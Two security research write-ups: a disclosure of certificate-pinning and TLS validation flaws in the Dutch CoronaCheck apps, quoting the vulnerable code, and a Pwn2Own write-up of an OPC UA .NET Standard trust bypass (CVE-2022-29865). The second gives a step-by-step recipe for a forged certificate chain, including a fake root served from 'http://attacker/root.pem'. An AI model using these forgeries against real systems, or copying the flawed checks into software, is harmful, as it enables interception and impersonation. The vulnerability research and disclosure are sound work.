The CoronaCheck app can be used to generate a QR code proving that the user has received either a COVID-19 vaccination, has recently received a negative test result or has recovered from COVID-19. A separate app, the CoronaCheck Verifier can be used to check these QR codes. These apps are used to give access to certain locations or events, which is known in The Netherlands as “Testen voor Toegang”. They may also be required for traveling to specific countries. The app used to generate the QR code is refered to in the codebase as the Holder app to distinguish it from the Verifier app. The source code of these apps is available on Github, although active development takes place in a separate non-public repository. At certain intervals, the public source code is updated from the private repository.

The Holder app:

The Verifier app:

The verification of the QR codes uses two different methods, depending on whether the code is for use in The Netherlands or internationally. The cryptographic process is very different for each. We spent a bit of time looking at these two processes, but found no (obvious) vulnerabilities.

Then we looked at the verification of the connections set up by the two apps. Part of the configuration of the app needs to be downloaded from a server hosted by the Ministerie van Volksgezondheid, Welzijn en Sport (VWS). This is because test results are retrieved by the app directly from the test provider. This means that the Holder app needs to know which test providers are used right now, how to connect to them and the Verifier app needs to know what keys to use to verify the signatures for that test provider. The privacy aspects of this design are quite good: the test provider only knows the user retrieved the result, but not where they are using it. VWS doesn’t know who has done a test or their results and the Verifier only sees the limited personal information in the QR which is needed to check the identity of the holder. The downside of this is that blocking a specific person’s QR code is difficult.

Strict requirements were formulated for the security of these connections in the design. See here (in Dutch). This includes the use of certificate pinning to check that the certificates are issued a small set of Certificate Authorities (CAs). In addition to the use of TLS, all responses from the APIs must be signed using a signature. This uses the PKCS#7 Cryptographic Message Syntax (CMS) format.

Many of the checks on certificates that were added in the iOS app contained subtle mistakes. Combined, only one implicit check on the certificate (performed by App Transport Security) was still effective. This meant that there was no certificate pinning at all and any malicious CA could generate a certificate capable of intercepting the connections between the app and VWS or a test provider.

Certificate check issues

An iOS app that wants to handle the checking of TLS certificates itself can do so by implementing the delegate method urlSession(_:didReceive:completionHandler:). Whenever a new connection is created, this method is called allowing the app to perform its own checks. It can respond in three different ways: continue with the usual validation (performDefaultHandling), accept the certificate (useCredential) or reject the certificate (cancelAuthenticationChallenge). This function can also be called for other authentication challenges, such as HTTP basic authentication, so it is common to check that the type is NSURLAuthenticationMethodServerTrust first.

This was implemented as follows in SecurityStrategy.swift lines 203 to 262:

203func checkSSL() {
204
205    guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust,
206          let serverTrust = challenge.protectionSpace.serverTrust else {
207
208        logDebug("No security strategy")
209        completionHandler(.performDefaultHandling, nil)
210        return
211    }
212
213    let policies = [SecPolicyCreateSSL(true, challenge.protectionSpace.host as CFString)]
214    SecTrustSetPolicies(serverTrust, policies as CFTypeRef)
215    let certificateCount = SecTrustGetCertificateCount(serverTrust)
216
217    var foundValidCertificate = false
218    var foundValidCommonNameEndsWithTrustedName = false
219    var foundValidFullyQualifiedDomainName = false
220
221    for index in 0 ..< certificateCount {
222
223        if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, index) {
224            let serverCert = Certificate(certificate: serverCertificate)
225
226            if let name = serverCert.commonName {
227                if name.lowercased() == challenge.protectionSpace.host.lowercased() {
228                    foundValidFullyQualifiedDomainName = true
229                    logVerbose("Host matched CN \(name)")
230                }
231                for trustedName in trustedNames {
232                    if name.lowercased().hasSuffix(trustedName.lowercased()) {
233                        foundValidCommonNameEndsWithTrustedName = true
234                        logVerbose("Found a valid name \(name)")
235                    }
236                }
237            }
238            if let san = openssl.getSubjectAlternativeName(serverCert.data), !foundValidFullyQualifiedDomainName {
239                if compareSan(san, name: challenge.protectionSpace.host.lowercased()) {
240                    foundValidFullyQualifiedDomainName = true
241                    logVerbose("Host matched SAN \(san)")
242                }
243            }
244            for trustedCertificate in trustedCertificates {
245
246                if openssl.compare(serverCert.data, withTrustedCertificate: trustedCertificate) {
247                    logVerbose("Found a match with a trusted Certificate")
248                    foundValidCertificate = true
249                }
250            }
251        }
252    }
253
254    if foundValidCertificate && foundValidCommonNameEndsWithTrustedName && foundValidFullyQualifiedDomainName {
255        // all good
256        logVerbose("Certificate signature is good for \(challenge.protectionSpace.host)")
257        completionHandler(.useCredential, URLCredential(trust: serverTrust))
258    } else {
259        logError("Invalid server trust")
260        completionHandler(.cancelAuthenticationChallenge, nil)
261    }
262}

If an app wants to implement additional verification checks, then it is common to start with performing the platform’s own certificate validation. This also means that the certificate chain is resolved. The certificates received from the server may be incomplete or contain additional certificates, by applying the platform verification a chain is constructed ending in a trusted root (if possible). An app that uses a private root could also do this, but while adding the root as the only trust anchor.

This leads to the first issue with the handling of certificate validation in the CoronaCheck app: instead of giving the “continue with the usual validation” result, the app would accept the certificate if its own checks passed (line 257). This meant that the checks are not additions to the verification, but replace it completely. The app does implicitly perform the platform verification to obtain the correct chain (line 215), but the result code for the validation was not checked, so an untrusted certificate was not rejected here.

The app performs 3 additional checks on the certificate:

  • It is issued by one of a list of root certificates (line 246).
  • It contains a Subject Alternative Name containing a specific domain (line 238).
  • It contains a Common Name containing a specific domain (lines 227 and 232).

For checking the root certificate the resolved chain is used and each certificate is compared to a list of certificates hard-coded in the app. This set of roots depends on what type of connection it is. Connections to the test providers are a bit more lenient, while the connection to the VWS servers itself needs to be issued by a specific root.

This check had a critical issue: the comparison was not based on unforgeable data. Comparing certificates properly could be done by comparing them byte-by-byte. Certificates are not very large, this comparison would be fast enough. Another option would be to generate a hash of both certificates and compare those. This could speed up repeated checks for the same certificate. The implemented comparison of the root certificate was based on two checks: comparing the serial number and comparing the “authority key information” extension fields. For trusted certificates, the serial number must be randomly generated by the CA. The authority key information field is usually a hash of the certificate’s issuer’s key, but this can be any data. It is trivial to generate a self-signed certificate with the same serial number and authority key information field as an existing certificate. Combine this with the previous item and it is possible to generate a new, self-signed certificate that is accepted by the TLS verification of the app.

OpenSSL.m lines 144 to 227:

144- (BOOL)compare:(NSData *)certificateData withTrustedCertificate:(NSData *)trustedCertificateData {
145
146	BOOL subjectKeyMatches = [self compareSubjectKeyIdentifier:certificateData with:trustedCertificateData];
147	BOOL serialNumbersMatches = [self compareSerialNumber:certificateData with:trustedCertificateData];
148	return subjectKeyMatches && serialNumbersMatches;
149}
150
151- (BOOL)compareSubjectKeyIdentifier:(NSData *)certificateData with:(NSData *)trustedCertificateData {
152
153	const ASN1_OCTET_STRING *trustedCertificateSubjectKeyIdentifier = NULL;
154	const ASN1_OCTET_STRING *certificateSubjectKeyIdentifier = NULL;
155	BIO *certificateBlob = NULL;
156	X509 *certificate = NULL;
157	BIO *trustedCertificateBlob = NULL;
158	X509 *trustedCertificate = NULL;
159	BOOL isMatch = NO;
160
161	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
162		EXITOUT("Cannot allocate certificateBlob");
163
164	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
165		EXITOUT("Cannot parse certificateData");
166
167	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
168		EXITOUT("Cannot allocate trustedCertificateBlob");
169
170	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
171		EXITOUT("Cannot parse trustedCertificate");
172
173	if (NULL == (trustedCertificateSubjectKeyIdentifier = X509_get0_subject_key_id(trustedCertificate)))
174		EXITOUT("Cannot extract trustedCertificateSubjectKeyIdentifier");
175
176	if (NULL == (certificateSubjectKeyIdentifier = X509_get0_subject_key_id(certificate)))
177		EXITOUT("Cannot extract certificateSubjectKeyIdentifier");
178
179	isMatch = ASN1_OCTET_STRING_cmp(trustedCertificateSubjectKeyIdentifier, certificateSubjectKeyIdentifier) == 0;
180
181errit:
182	BIO_free(certificateBlob);
183	BIO_free(trustedCertificateBlob);
184	X509_free(certificate);
185	X509_free(trustedCertificate);
186
187	return isMatch;
188}
189
190- (BOOL)compareSerialNumber:(NSData *)certificateData with:(NSData *)trustedCertificateData {
191
192	BIO *certificateBlob = NULL;
193	X509 *certificate = NULL;
194	BIO *trustedCertificateBlob = NULL;
195	X509 *trustedCertificate = NULL;
196	ASN1_INTEGER *certificateSerial = NULL;
197	ASN1_INTEGER *trustedCertificateSerial = NULL;
198	BOOL isMatch = NO;
199
200	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
201		EXITOUT("Cannot allocate certificateBlob");
202
203	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
204		EXITOUT("Cannot parse certificate");
205
206	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
207		EXITOUT("Cannot allocate trustedCertificateBlob");
208
209	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
210		EXITOUT("Cannot parse trustedCertificate");
211
212	if (NULL == (certificateSerial = X509_get_serialNumber(certificate)))
213		EXITOUT("Cannot parse certificateSerial");
214
215	if (NULL == (trustedCertificateSerial = X509_get_serialNumber(trustedCertificate)))
216		EXITOUT("Cannot parse trustedCertificateSerial");
217
218	isMatch = ASN1_INTEGER_cmp(certificateSerial, trustedCertificateSerial) == 0;
219
220errit:
221	if (certificateBlob) BIO_free(certificateBlob);
222	if (trustedCertificateBlob) BIO_free(trustedCertificateBlob);
223	if (certificate) X509_free(certificate);
224	if (trustedCertificate) X509_free(trustedCertificate);
225
226	return isMatch;
227}

This combination of issues may sound like TLS validation was completely broken, but luckily there was a safety net. In iOS 9, Apple introduced a mechanism called App Transport Security (ATS) to enforce certificate validation on connections. This is used to enforce the use of secure and trusted HTTPS connections. If an app wants to use an insecure connection (either plain HTTP or HTTPS with certificates not issued by a trusted root), it needs to specifically opt-in to that in its Info.plist file. This creates something of a safety net, making it harder to accidentally disable TLS certificate validation due to programming mistakes.

ATS was enabled for the CoronaCheck apps without any exceptions. This meant that our untrusted certificate, even though accepted by the app itself, was rejected by ATS. This meant we couldn’t completely bypass the certificate validation. This could however still be exploitable in these scenarios:

  • A future update for the app could add an ATS exception or an update to iOS might change the ATS rules. Adding an ATS exception is not as unrealistic as it may sound: the app contains a trusted root that is not included in the iOS trust store (“Staat der Nederlanden Private Root CA - G1”). To actually use that root would require an ATS exception.
  • A malicious CA could issue a certificate using the serial number and authority key information of one of the trusted certificates. This certificate would be accepted by ATS and pass all checks. A reliable CA would not issue such a certificate, but it does mean that the certificate pinning that was part of the requirements was not effective.

Other issues

We found a number of other issues in the verification of certificates. These are of lower impact.

Subject Alternative Names

In the past, the Common Name field was used to indicate for which domain a certificate was for. This was inflexible, because it meant each certificate was only valid for one domain. The Subject Alternative Name (SAN) extension was added to make it possible to add more domain names (or other types of names) to certificates. To correctly verify if a certificate is valid for a domain, the SAN extension has to be checked.

Obtaining the SANs from a certificates was implemented by using OpenSSL to generate a human-readable representation of the SAN extension and then parsing that. This did not take into account the possibility of other name types than a domain name, such as an email addresses in a certificate used for S/MIME. The parsing could be confused using specifically formatted email addresses to make it match any domain name.

SecurityStrategy.swift lines 114 to 127:

114func compareSan(_ san: String, name: String) -> Bool {
115
116    let sanNames = san.split(separator: ",")
117    for sanName in sanNames {
118        // SanName can be like DNS: *.domain.nl
119        let pattern = String(sanName)
120            .replacingOccurrences(of: "DNS:", with: "", options: .caseInsensitive)
121            .trimmingCharacters(in: .whitespacesAndNewlines)
122        if wildcardMatch(name, pattern: pattern) {
123            return true
124        }
125    }
126    return false
127}

For example, an S/MIME certificate containing the email address "a,*,b"@example.com (which is a valid email address) would result in a wildcard domain (*) that matches all hosts.

CMS signatures

The domain name check for the certificate used to generate the CMS signature of the response did not compare the full domain name, instead it checked that a specific string occurred in the domain (coronacheck.nl) and that it ends with a specific string (.nl). This means that an attacker with a certificate for coronacheck.nl.example.nl could also CMS sign API responses.

OpenSSL.m lines 259 to 278:

259- (BOOL)validateCommonNameForCertificate:(X509 *)certificate
260                         requiredContent:(NSString *)requiredContent
261                          requiredSuffix:(NSString *)requiredSuffix {
262    
263    // Get subject from certificate
264    X509_NAME *certificateSubjectName = X509_get_subject_name(certificate);
265    
266    // Get Common Name from certificate subject
267    char certificateCommonName[256];
268    X509_NAME_get_text_by_NID(certificateSubjectName, NID_commonName, certificateCommonName, 256);
269    NSString *cnString = [NSString stringWithUTF8String:certificateCommonName];
270    
271    // Compare Common Name to required content and required suffix
272    BOOL containsRequiredContent = [cnString rangeOfString:requiredContent options:NSCaseInsensitiveSearch].location != NSNotFound;
273    BOOL hasCorrectSuffix = [cnString hasSuffix:requiredSuffix];
274    
275    certificateSubjectName = NULL;
276    
277    return hasCorrectSuffix && containsRequiredContent;
278}

The only issue we found on the Android implementation is similar: the check for the CMS signature used a regex to check the name of the signing certificate. This regex was not bound on the right, making also possible to bypass it using coronacheck.nl.example.com.

SignatureValidator.kt lines 94 to 96:

94fun cnMatching(substring: String): Builder {
95    return cnMatching(Regex(Regex.escape(substring)))
96}

SignatureValidator.kt line 142 to 149:

if (cnMatchingRegex != null) {
    if (!JcaX509CertificateHolder(signingCertificate).subject.getRDNs(BCStyle.CN).any {
            val cn = IETFUtils.valueToString(it.first.value)
            cnMatchingRegex.containsMatchIn(cn)
        }) {
        throw SignatureValidationException("Signing certificate does not match expected CN")
    }
}

Because these certificates had to be issued by PKI-Overheid (a CA run by the Dutch government) certificate, it might not have been easy to obtain a certificate with such a domain name.

Race condition

We also found a race condition in the application of the certificate validation rules. As we mentioned, the rules the app applied for certificate validation were more strict for VWS connections than for connections to test providers, and even for connections to VWS there were different levels of strictness. However, if two requests were performed quickly after another, the first request could be validated based on the verification rules specified for the second request. In practice, the least strict verification rules still require a valid certificate, so this can not be used to intercept connections either. However, it was already triggering in normal use, as the app was initiating two requests with different validation rules immediately after starting.

Reporting

We reported these vulnerabilities to the email address on the “Kwetsbaarheid melden” (Report a vulnerability) page on June 30th, 2021. This email bounced because the address did not exist. We had to reach out through other channels to find a working address. We received an acknowledgement that the message was received, but no further updates. The vulnerabilities were fixed quietly, without letting us know that they were fixed.

In October we decided to look at the code on GitHub to check if all issues were resolved correctly. While most issues were fixed, one was not fixed properly. We sent another email detailing this issue. This was again fixed without informing us.

Developers are of course not required to keep us in the loop of the if we report a vulnerability, but this does show that if they had, we could have caught the incorrect fix much earlier.

Recommendation

TLS certificate validation is a complex process. This case demonstrates that adding more checks is not always better, because they might interfere with the normal platform certificate validation. We recommend changing the certificate validation process only if absolutely necessary. Any extra checks should have a clear security goal. Checks such as “the domain must contain the string …” (instead of “must end with …”) have no security benefit and should be avoided.

Certificate pinning not only has implementation challenges, but also operational challenges. If a certificate renewal has not been properly planned, then it may leave an app unable to connect. This is why we usually recommend pinning only for applications handling very sensitive user data. Other checks can be implemented to address the risk of a malicious or compromised CA with much less chance of problems, for example checking the revocation and Certificate Transparency status of a certificate.

Conclusion

We found and reported a number of issues in the verification of TLS certificates used for the connections of the Dutch CoronaCheck apps. These vulnerabilities could have been combined to bypass certificate pinning in the app. In most cases, this could only be abused by a compromised or malicious CA or if a specific CA could be used to issue a certificate for a certain domain. These vulnerabilities have since then been fixed.

Pwn2Own Miami 2022: OPC UA .NET Standard Trusted Application Check Bypass

19 July 2022 at 00:00

This write-up is part 1 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for the Trusted Application Check Bypass in the OPC Foundation’s OPC UA .NET Standard (CVE-2022-29865).

Wow - confirmed! With one of the more interesting bugs we've seen at #Pwn2Own, @daankeuper and @xnyhps from @sector7_nl bypassed the trusted application check on the OPC Foundation OPC UA .NET Standard. The earn $40,000 and 40 Master of Pwn points. #P2OMiami pic.twitter.com/HaTDARh03j

— Zero Day Initiative (@thezdi) April 20, 2022

OPC UA is a communication protocol used in the ICS world. It is an open standard developed by the OPC Foundation. Because it is implemented by many vendors, it is often the preferred protocol for setting up communication between systems from different vendors in an ICS network.

The security for OPC UA connections can be configured in three different ways: without any security, only signing and signing and encryption. In the latter two cases, both endpoints authenticate to each other using X.509 certificates. While these are the same type of certificates as used in TLS, the encryption protocol itself is custom and not based on TLS.

At Pwn2Own Miami 2022, four OPC UA servers were in scope, with three different “payload” options:

  • Denial-of-Service. Availability is everything in an ICS network, so being able to crash an OPC UA server can have significant impact.
  • Remote code execution. Being able to take over the server.
  • Bypass Trusted Application Check. Setting up a trusted connection to a server without having a valid certificate.

Of course, with a pre-authentication RCE it would be possible to modify the configuration of the server to change the security level and bypass the trusted application check that way, but this was not allowed.

OPC UA .NET Standard

We looked at potential trusted certificate bypasses in all four servers in scope, we only found one in the server OPC UA .NET Standard. This server is used as a reference implementation for OPC UA in C# and is open source, meaning that this bypass could affect many ICS products that incorporate it as a library.

The core of the issue is in the function InternalValidate in CertificateValidator.cs. The logic for verifying a certificate here is quite complicated, which likely contributed to a bug like this to be missed.

What we heard from the OPC Foundation is that the reason this check is so complicated is that they do not want to use the built-in certificate store of Windows. Instead, the certificates of the application can be managed by placing the certificate files in a specific directory on the server. The OPC UA specification has such a high level of detail that it even suggests how to store those certificates.

The core issue here is that two different certificate chains are built without verifying that they are equal. By crafting a chain in a very specific way, it is possible to make the server accept it, even though it is not signed by a trusted root.

862protected virtual async Task InternalValidate(X509Certificate2Collection certificates, ConfiguredEndpoint endpoint)
863{
864    X509Certificate2 certificate = certificates[0];
865
866    // check for previously validated certificate.
867    X509Certificate2 certificate2 = null;
868
869    if (m_validatedCertificates.TryGetValue(certificate.Thumbprint, out certificate2))
870    {
871        if (Utils.IsEqual(certificate2.RawData, certificate.RawData))
872        {
873            return;
874        }
875    }
876
877    CertificateIdentifier trustedCertificate = await GetTrustedCertificate(certificate).ConfigureAwait(false);
878
879    // get the issuers (checks the revocation lists if using directory stores).
880    List<CertificateIdentifier> issuers = new List<CertificateIdentifier>();
881    Dictionary<X509Certificate2, ServiceResultException> validationErrors = new Dictionary<X509Certificate2, ServiceResultException>();
882
883    bool isIssuerTrusted = await GetIssuersNoExceptionsOnGetIssuer(certificates, issuers, validationErrors).ConfigureAwait(false);
884
885    ServiceResult sresult = PopulateSresultWithValidationErrors(validationErrors);
886
887    // setup policy chain
888    X509ChainPolicy policy = new X509ChainPolicy();
889    policy.RevocationFlag = X509RevocationFlag.EntireChain;
890    policy.RevocationMode = X509RevocationMode.NoCheck;
891    policy.VerificationFlags = X509VerificationFlags.NoFlag;
892
893    foreach (CertificateIdentifier issuer in issuers)
894    {
895        if ((issuer.ValidationOptions & CertificateValidationOptions.SuppressRevocationStatusUnknown) != 0)
896        {
897            policy.VerificationFlags |= X509VerificationFlags.IgnoreCertificateAuthorityRevocationUnknown;
898            policy.VerificationFlags |= X509VerificationFlags.IgnoreCtlSignerRevocationUnknown;
899            policy.VerificationFlags |= X509VerificationFlags.IgnoreEndRevocationUnknown;
900            policy.VerificationFlags |= X509VerificationFlags.IgnoreRootRevocationUnknown;
901        }
902
903        // we did the revocation check in the GetIssuers call. No need here.
904        policy.RevocationMode = X509RevocationMode.NoCheck;
905        policy.ExtraStore.Add(issuer.Certificate);
906    }
907
908    // build chain.
909    using (X509Chain chain = new X509Chain())
910    {
911        chain.ChainPolicy = policy;
912        chain.Build(certificate);
913
914        // check the chain results.
915        CertificateIdentifier target = trustedCertificate;
916
917        if (target == null)
918        {
919            target = new CertificateIdentifier(certificate);
920        }
921
922        for (int ii = 0; ii < chain.ChainElements.Count; ii++)
923        {
924            X509ChainElement element = chain.ChainElements[ii];
925
926            CertificateIdentifier issuer = null;
927
928            if (ii < issuers.Count)
929            {
930                issuer = issuers[ii];
931            }
932
933            // check for chain status errors.
934            if (element.ChainElementStatus.Length > 0)
935            {
936                foreach (X509ChainStatus status in element.ChainElementStatus)
937                {
938                    ServiceResult result = CheckChainStatus(status, target, issuer, (ii != 0));
939                    if (ServiceResult.IsBad(result))
940                    {
941                        sresult = new ServiceResult(result, sresult);
942                    }
943                }
944            }
945
946            if (issuer != null)
947            {
948                target = issuer;
949            }
950        }
951    }
952[...]

First, on line 883, GetIssuersNoExceptionsOnGetIssuer is used to construct a certificate chain for the to be validated certificate (the out variable issuers). This function works in a loop. In each iteration, it attempts to find the issuer of the current certificate. For this it consults the following locations:

  1. The list of trusted certificates stored on the server. If it is found in this list, the function will return true.
  2. The list of issuer certificates stored on the server. These certificates are not explicitly trusted, but can be used to construct a chain to a trusted root.
  3. The list of additional certificates sent by the client. Just like in TLS, it is possible to include additional certificates in the OPC UA handshake.

If an issuer is found, it becomes the current certificate and the loop will continue until the current certificate is self-signed or an issuer can not be found.

To find the issuer of a certificate, the function Match is used. This function compares the issuer name of the certificate with the subject name of each potential issuer. Additionally, the serial number or the subject key identifier must match. Note that the cryptographic signature is not yet considered at this stage, the match is therefore only based on forgeable certificate metadata.

The comparison of the names in Match is implemented in CompareDistinguishedName, but this implementation is unusual. This function decomposes the name into components and then does a case-insensitive match on each component. This is not how most implementations compare X.509 names.

Next up, on line 912 an X509Chain object is used. The intent here appears to be to verify that the chain built using GetIssuersNoExceptionsOnGetIssuer is cryptographically valid. However, because it is not configured with the root certificates used by the application, it will often result in errors. Thus, on line 938, the function CheckChainStatus is used to ignore certain types of errors. For example, an UntrustedRoot error is ignored if it occurred for the certificate at the root.

The vulnerability that we found is that there is no verification that the certificate chain built by GetIssuersNoExceptionsOnGetIssuer and the one built by X509Chain.Build are equal. By abusing the unusual name comparison it is possible to construct a certificate such that both functions will result in a different chain. By making sure that the errors in the second chain only occur where CheckChainStatus ignores them, it is possible for this certificate to get accepted by the server.

The only prerequisite for this attack is that we know the subject name of one of the trusted root certificates and either its serial number or subject key identifier. Because certificates are not secret, these values should be easy to obtain in practice. During the demonstration, we ran the attack against a server which itself has a certificate issued by a trusted root certificate. That certificate gives us the metadata we need. In practice this should work quite often.

Example

Certificates

Suppose the server is configured to trust a certificate with the following details:

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 9891791597891487306 (0x8946b40ca084064a)
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: CN=Root
        Validity
            Not Before: Feb 24 09:35:53 2022 GMT
            Not After : Feb 24 09:35:53 2023 GMT
        Subject: CN=Root
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    [...]
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier:
                DirName:/CN=Root
                serial:89:46:B4:0C:A0:84:06:4A

            X509v3 Basic Constraints:
                CA:TRUE
            X509v3 Key Usage:
                Certificate Sign, CRL Sign
    Signature Algorithm: sha1WithRSAEncryption
         [...]

And suppose that the OPC server itself is configured with the following certificate, issued from this root:

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            35:b3:1d:0a:27:cf:e3:94:25:b1:46:b8:35:47:07:1c:3a:54:0a:e8
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: CN=Root
        Validity
            Not Before: Feb 24 09:35:53 2022 GMT
            Not After : Mar 26 09:35:53 2022 GMT
        Subject: CN=Quickstart Reference Server, C=US, ST=Arizona, O=OPC Foundation, DC=opcserver
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    [...]
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier:
                DirName:/CN=Root
                serial:89:46:B4:0C:A0:84:06:4A

            X509v3 Basic Constraints:
                CA:FALSE
            X509v3 Key Usage:
                Digital Signature, Key Encipherment, Data Encipherment, Key Agreement
            X509v3 Subject Alternative Name:
                DNS:opcserver, URI:URI:urn:opcserver
    Signature Algorithm: sha1WithRSAEncryption
         [...]

Then the attacker can connect to the server to obtain this certificate and use the data in the Issuer and X509v3 Authority Key Identifier fields to craft two new certificates.

First of all, the attacker generates a new root certificate which uses the same common name as the trusted root certificate, but where each letter is flipped in case (i.e.: upper case to lower case and lower case to upper case). This certificate is self-signed and must contain the CA=TRUE basic constraint. The attacker makes this certificate available for download as a PEM file over HTTP on a webserver at the URL http://attacker/root.pem.

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            18:c6:c2:36:a6:97:b1:a8:10:4b:07:7c:4b:20:5e:f2:d0:8b:e0:a2
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN=rOOT
        Validity
            Not Before: Feb 17 10:40:24 2022 GMT
            Not After : May 25 10:40:24 2022 GMT
        Subject: CN=rOOT
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (3072 bit)
                Modulus:
                    [...]
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints:
                CA:TRUE
            X509v3 Key Usage:
                Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
    Signature Algorithm: sha256WithRSAEncryption
         [...]

Secondly, the attacker generates a new leaf certificate, signed using the previously created root. The following fields are added to this certificate:

  • The issuer contains the subject name of the fake root.
  • The X509v3 Authority Key Identifier extension contains a directory name of the fake root and a serial number of the real trusted root.
  • The certificate contains an Authority Information Access extension containing a CA Issuers field containing the URL where the fake root certificate PEM file can be downloaded.

All other fields, like the Subject and Subject Alternative Name fields, can contain any data the attacker may choose. To pass all further checks in InternalValidate, the validity time should contain the current time and the keyUsage field should contain Data Encipherment. A Subject Alternative Name extension could be added if the domain is checked.

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            0e:4f:b8:ff:bd:d9:3a:fe:e7:0a:b2:eb:64:32:59:5e:ad:08:01:39
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN=rOOT
        Validity
            Not Before: Feb 17 10:40:24 2022 GMT
            Not After : May 25 10:40:24 2022 GMT
        Subject: CN=FakeCert
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (3072 bit)
                Modulus:
                    [...]
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier:
                DirName:/CN=rOOT
                serial:89:46:B4:0C:A0:84:06:4A

            X509v3 Basic Constraints:
                CA:FALSE
            Authority Information Access:
                CA Issuers - URI:http://attacker/root.pem

            X509v3 Key Usage:
                Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
    Signature Algorithm: sha256WithRSAEncryption
         [...]

Verification

When the attacker connects with this CN=FakeCert certificate, the following will happen:

GetIssuersNoExceptionsOnGetIssuer will look in its trusted certificate store for the issuer of this certificate. To do this, it compares the Issuer name of the received certificate with the Subject name of the certificates in the store.

It does this check by decomposing the distinguished name, sorting the components, and then doing a case-insensitive match on each component.

So, it compares the common name of the issuer from the certificate:

CN=rOOT

with the common name of the subject of the trusted certificate:

CN=Root

In addition, it will compare the serial number of the root certificate with the serial number of the authority key identifier extension, which are equal:

Serial Number: 9891791597891487306 (0x8946b40ca084064a)
X509v3 Authority Key Identifier:
                DirName:/CN=rOOT
                serial:89:46:B4:0C:A0:84:06:4A

This function will therefore consider the CN=Root certificate a match. The signature could show that it is not correctly signed, but this is not checked yet. It will obtain a chain with one issuer and isIssuerTrusted will be true.

Then, it creates an X509Chain object and calls chain.Build(certificate). The result code of this call is ignored, and the global status of the result too. Only the statuses of the individual chain elements are checked.

As chain.Build does a literal comparison on the subject of the trusted root with the issuer of FakeCert, it will not consider the CN=Root certificate to be the issuer of FakeCert (because it looks for CN=rOOT). While the serial number from the Authority Key Identifier extension matches, this is not sufficient for a match.

Because it can’t find the issuer certificate in its trust store, it will use the CA Issuers URL from the Authority Information Access extension to download the certificate from the webserver. With that, the result of the chain.Build() call will be a chain of two certificates, where the second one indicates the error UntrustedRoot. The function CheckChainStatus ignores this error code because it incorrectly assumes that the corresponding certificate was one of its trusted certificates, but it will in fact be the CN=rOOT certificate.

The remainder of the checks in InternalValidate will now succeed, because issuedByCA is true and isIssuerTrusted is true. The key usage, endpoint domain, use of SHA1 and minimum key size checks can be passed because the attacker has full control over the contents of FakeCert.

Our exploit can been seen in action in the video below:

Impact

With this vulnerability we could bypass the Trusted Application Check against the reference server that is included in the OPC UA .NET Standard repository. It would also be possible to bypass the check at the client side to impersonate a server.

In addition, OPC UA also has what is known as “User Authentication”, which happens after the Trusted Application Check to establish a session. One of the options for User Authentication is by using an X.509 certificate, which could be bypassed in the same way too.

In most places in practice the OPC UA server would not be exposed to the public internet, so to exploit this issue an attacker would need to already have access to an internal ICS network. However, in rare cases where exposing an OPC UA server to the public internet would be unavoidable, enabling certificate authentication would be the most effective method for securing it. In that case, this check could be bypassed and it would be possible to gain access to the communication.

Once connected to an OPC UA server, the attacker would be able to read and write data, which could be used to disrupt the ICS processes that use this server.

The fix

The issues we found were fixed in the commit 51549f5ed846c8ac060add509c76ff4c0470f24d and assigned CVE-2022-29865. Names are now compared in the same manner as other X.509 implementations, by not doing a case-insensitive check and no resorting of name components. In addition, defensive checks were added to make sure that the two certificate chains that are used are equal.

Thoughts

Certificate validation is tricky, as we have also demonstrated before in our post about the Dutch Corona-check app. These vulnerabilities actually bear some similarity, as both used a check for issuers based only on forgeable data. In this case, the cause is the desire to not use the Windows certificate store. We are unsure if this is truly the only way to implement this in .NET, as the CustomTrustStore property and TrustMode=CustomRootTrust setting on an X509ChainPolicy object appear to offer the required functionality without a dependence on the Windows certificate store.

The level of detail in the OPC UA specification regarding certificate validation is admirable. For example, it specifies clearly what errors should be used in what situations and there is even a chapter that suggests how to store the certificates on the server. However, there is a risk that over-specification of how a process like this should work leads to complex and non-idiomatic code. If the normal .NET API can no longer be applied directly as certain parts need to be re-implemented, this could create a large potential source for vulnerabilities.

Conclusion

We demonstrated a Trusted Application Check Bypass in OPC Foundation OPC UA .NET Standard. This can be used to set up a trusted connection to an OPC UA server. The cause of this vulnerability was the modification of the certificate validation procedure to use trusted roots stored in a custom location instead of the Windows certificate store and an unusual name comparison. This made it possible to made our certificate appear to be signed by one of the trusted roots.

